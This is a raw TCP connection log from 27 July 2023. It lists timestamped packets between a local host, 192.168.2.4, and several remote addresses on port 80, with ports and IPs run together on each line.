                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547530890 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547561884 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547606945 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547653913 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547672033 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547719002 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547722101 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547779083 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547785044 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547833920 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547866106 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547880888 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547887087 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.547930956 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548110962 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548161983 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548175097 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548207045 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548211098 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548254013 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548257113 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548316956 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548341036 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.548393011 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549071074 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549123049 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549150944 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549171925 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549174070 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549216986 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549218893 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549264908 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549264908 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.549314022 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550137997 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550223112 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550224066 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550276041 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550293922 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550343990 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550365925 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550415039 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550431013 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.550482035 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.551037073 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.551114082 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.551182985 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.551249027 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.551290035 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.551316023 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.551340103 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.551376104 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564095974 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564162016 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564208984 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564254045 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564258099 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564321041 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564342022 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564358950 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564389944 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564400911 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564435959 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564444065 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564481020 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564491034 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564526081 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564532995 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.564584017 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565320015 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565371037 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565417051 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565439939 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565464020 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565481901 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565510035 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565516949 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.565558910 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566313028 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566365004 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566411972 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566443920 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566458941 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566489935 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566505909 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566519976 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.566813946 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.567231894 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.567285061 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.567313910 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.567337990 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.567338943 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.567395926 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.568841934 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.568892002 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.568912983 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.568938971 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.568969011 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.568986893 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569003105 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569032907 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569200039 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569278955 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569328070 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569339991 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569374084 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569385052 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569437027 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569446087 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569492102 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569506884 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.569650888 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570277929 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570326090 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570369959 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570415974 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570436954 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570436954 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570436954 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570461035 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570463896 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.570508957 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571177959 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571229935 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571275949 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571320057 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571321011 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571322918 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571355104 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571367979 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.571377993 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572313070 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572382927 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572402954 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572443962 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572448015 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572494984 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572510958 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572561026 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572571039 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.572623968 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573105097 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573178053 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573179007 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573225975 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573241949 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573287964 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573307991 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573369980 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573402882 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.573431015 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574074984 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574152946 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574217081 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574228048 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574279070 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574278116 CEST4997780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574312925 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574335098 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574342966 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574388981 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574976921 CEST4972280192.168.2.460.43.154.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.574980974 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.575048923 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.575102091 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.575109959 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.575115919 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.575167894 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.576498985 CEST4997880192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.578253031 CEST4997980192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.580167055 CEST4998080192.168.2.460.43.154.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.580648899 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.580702066 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.580746889 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.580790997 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.580862999 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.580899954 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.580977917 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581034899 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581053019 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581077099 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581089020 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581118107 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581135988 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581161022 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581186056 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581216097 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581921101 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.581967115 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582007885 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582051992 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582093000 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582093954 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582140923 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582187891 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582855940 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582902908 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582945108 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.582987070 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583029032 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583040953 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583170891 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583189011 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583731890 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583781004 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583817005 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583852053 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583884001 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583904028 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.583967924 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584592104 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584645987 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584691048 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584692955 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584716082 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584737062 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584784031 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584804058 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.584844112 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.585473061 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.585525990 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.585571051 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.585612059 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.585633993 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586014986 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586061001 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586105108 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586127996 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586150885 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586170912 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586194038 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586216927 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586260080 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586872101 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586919069 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.586961985 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587004900 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587048054 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587086916 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587109089 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587156057 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587699890 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587733984 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587815046 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587845087 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587874889 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587882996 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587915897 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.587960005 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.588491917 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.588526011 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.588557005 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.588587999 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.588618040 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.588681936 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.588707924 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.589334011 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.589401007 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.589428902 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.589458942 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.589493036 CEST4996480192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.589495897 CEST8049964104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.589523077 CEST4996480192.168.2.4104.26.15.53
